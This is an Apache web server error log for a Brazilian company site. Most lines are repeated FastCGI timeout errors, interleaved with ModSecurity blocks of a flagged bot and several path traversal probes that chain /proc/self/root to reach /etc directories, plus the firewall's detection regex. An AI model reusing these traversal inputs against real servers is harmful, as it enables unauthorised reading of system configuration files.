[Thu Mar 19 19:15:49.934807 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.243.128:58202] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx1lcdf6f5d65gmYZSmCgAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 19:16:12.845924 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:52276] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:16:37.605873 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:52708] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:17:13.433871 2026] [proxy_fcgi:error] [pid 7545:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:52906] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:17:35.960202 2026] [proxy_fcgi:error] [pid 21563:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:53608] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:18:00.389915 2026] [proxy_fcgi:error] [pid 8307:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54090] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:18:23.341868 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:54456] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:18:51.773564 2026] [proxy_fcgi:error] [pid 20435:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:54812] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:19:30.573834 2026] [proxy_fcgi:error] [pid 8307:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55058] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:20:11.458453 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:55192] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:20:33.249060 2026] [proxy_fcgi:error] [pid 19655:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:55496] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:20:57.165878 2026] [proxy_fcgi:error] [pid 17653:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:55634] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:21:41.205810 2026] [proxy_fcgi:error] [pid 27293:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:55710] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:23:31.009876 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:55810] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:23:54.580505 2026] [proxy_fcgi:error] [pid 21563:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:56076] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:24:06.235297 2026] [:error] [pid 19655:tid 140411658000128] [client 74.7.244.43:44582] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx3hk1ujooLWdUDGy4BUAAAAEo"]
[Thu Mar 19 19:24:47.673562 2026] [proxy_fcgi:error] [pid 19655:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:56236] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:25:37.226772 2026] [proxy_fcgi:error] [pid 19655:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56322] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:26:34.062549 2026] [proxy_fcgi:error] [pid 27293:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56450] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:27:40.637883 2026] [proxy_fcgi:error] [pid 7235:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56564] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:28:31.059461 2026] [proxy_fcgi:error] [pid 8307:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56706] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:28:57.261880 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:56812] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:29:39.685887 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:56860] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:30:39.821814 2026] [proxy_fcgi:error] [pid 19655:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:56938] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:31:29.189842 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:57042] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:32:30.897805 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:57204] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:33:24.917829 2026] [proxy_fcgi:error] [pid 7545:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:57340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:34:09.573883 2026] [proxy_fcgi:error] [pid 7893:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:57442] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:35:04.305445 2026] [proxy_fcgi:error] [pid 17887:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:57538] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:35:26.329769 2026] [proxy_fcgi:error] [pid 7893:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:57840] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:35:56.417281 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:57948] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:36:37.069891 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:37:26.274898 2026] [proxy_fcgi:error] [pid 19655:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:58096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:38:15.345803 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:58234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:38:40.997976 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:39:11.145782 2026] [proxy_fcgi:error] [pid 7893:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:58492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:40:15.297953 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:58566] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:40:39.286158 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:58862] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:40:39.542964 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.228.61:46626] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx7Z9a6ubjKNq_cu4aBfQAAA1A"]
[Thu Mar 19 19:41:21.697827 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58964] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:41:53.104754 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59054] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:42:24.462586 2026] [:error] [pid 5816:tid 140411666392832] [client 74.7.243.128:41264] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx70JfmNfuxceSuAELA-QAAAck"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 19:43:15.427194 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:43:55.253826 2026] [proxy_fcgi:error] [pid 7235:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:59274] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:44:17.604906 2026] [proxy_fcgi:error] [pid 7235:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:59694] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:44:39.045825 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:59912] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:45:35.345799 2026] [proxy_fcgi:error] [pid 30077:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:59946] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:46:21.809224 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:60124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:46:33.796222 2026] [:error] [pid 5816:tid 140411574073088] [client 74.7.228.61:47976] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx8yZfmNfuxceSuAELBEAAAAdQ"]
[Thu Mar 19 19:47:20.629825 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:60196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:47:50.230026 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:60328] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:49:01.506062 2026] [proxy_fcgi:error] [pid 7235:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:60376] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:50:35.281902 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:60536] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:50:59.497858 2026] [proxy_fcgi:error] [pid 21219:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:32776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:51:24.981839 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:33014] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:51:41.856401 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.228.61:33596] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx9_da6ubjKNq_cu4aBygAAA1c"]
[Thu Mar 19 19:51:46.158175 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33122] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:52:11.197855 2026] [proxy_fcgi:error] [pid 26799:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:33208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:52:49.749876 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:53:18.933834 2026] [proxy_fcgi:error] [pid 20435:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33320] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:53:40.081844 2026] [proxy_fcgi:error] [pid 5816:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33648] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:54:01.121805 2026] [proxy_fcgi:error] [pid 17887:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:33824] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:54:22.129780 2026] [proxy_fcgi:error] [pid 17653:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33920] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:55:21.936121 2026] [:error] [pid 19655:tid 140411683178240] [client 74.7.244.43:54128] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx-2U1ujooLWdUDGy4BsgAAAEc"]
[Thu Mar 19 19:55:35.397966 2026] [proxy_fcgi:error] [pid 7235:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34014] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:56:14.313804 2026] [proxy_fcgi:error] [pid 7893:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34120] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:56:15.440598 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.243.128:46110] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abx_DxCii7xarUs8iHYXtAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 19:56:36.117402 2026] [proxy_fcgi:error] [pid 21219:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34414] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:56:54.115154 2026] [:error] [pid 21219:tid 140411632822016] [client 74.7.228.61:33514] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abx_NvXLqtnMIWvjpaJLZAAAAo0"]
[Thu Mar 19 19:56:57.127891 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:34570] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:57:18.033846 2026] [proxy_fcgi:error] [pid 14269:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:34694] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:57:49.862896 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:34770] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:58:37.117806 2026] [proxy_fcgi:error] [pid 20435:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34838] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:58:59.125842 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35180] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:59:20.125808 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:35366] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 19:59:41.121775 2026] [proxy_fcgi:error] [pid 8307:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35528] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:00:02.179815 2026] [proxy_fcgi:error] [pid 21563:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:35682] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:00:23.057832 2026] [proxy_fcgi:error] [pid 21563:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35814] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:00:44.157951 2026] [proxy_fcgi:error] [pid 19655:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36024] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:01:05.125810 2026] [proxy_fcgi:error] [pid 19655:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36226] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:01:26.129816 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:36472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:01:47.127657 2026] [proxy_fcgi:error] [pid 5816:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:36732] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:02:08.125830 2026] [proxy_fcgi:error] [pid 30077:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37006] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:02:23.278894 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.243.128:56512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abyAf_u8EFLIOrSqIpvVbAAAAlE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 20:02:29.073831 2026] [proxy_fcgi:error] [pid 21219:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37314] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:02:43.615139 2026] [:error] [pid 19655:tid 140411599251200] [client 74.7.243.128:51472] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abyAk01ujooLWdUDGy4CVgAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 20:02:51.133830 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:37696] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:03:02.530428 2026] [:error] [pid 21219:tid 140411725141760] [client 74.7.243.128:44768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abyApvXLqtnMIWvjpaJMEQAAAoI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 20:03:14.908207 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:37982] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:03:36.497855 2026] [proxy_fcgi:error] [pid 7893:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:38104] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:04:07.041803 2026] [proxy_fcgi:error] [pid 7235:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38692] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:04:35.381807 2026] [proxy_fcgi:error] [pid 26799:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39162] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:05:04.267449 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:39628] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:05:32.201958 2026] [proxy_fcgi:error] [pid 7545:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:40106] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:05:56.595477 2026] [proxy_fcgi:error] [pid 7235:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40612] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:06:12.993953 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.244.43:51116] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyBZNa6ubjKNq_cu4aCbwAAA1U"]
[Thu Mar 19 20:06:25.137784 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41084] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:06:46.061804 2026] [proxy_fcgi:error] [pid 27293:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41398] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:07:08.041393 2026] [proxy_fcgi:error] [pid 19655:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:41898] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:07:29.565816 2026] [proxy_fcgi:error] [pid 21563:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42360] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:07:45.824281 2026] [:error] [pid 21563:tid 140411666392832] [client 74.7.228.61:35288] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyBwUpm7ZmxKZTM4bZy8gAAA4k"]
[Thu Mar 19 20:07:51.253816 2026] [proxy_fcgi:error] [pid 14269:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:08:14.969865 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:43164] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:08:55.237792 2026] [proxy_fcgi:error] [pid 15826:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:43346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 20:09:17.177830 2026] [proxy_fcgi:error] [pid 27293:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:44064] AH01075: Error dispatching request to : (polling)
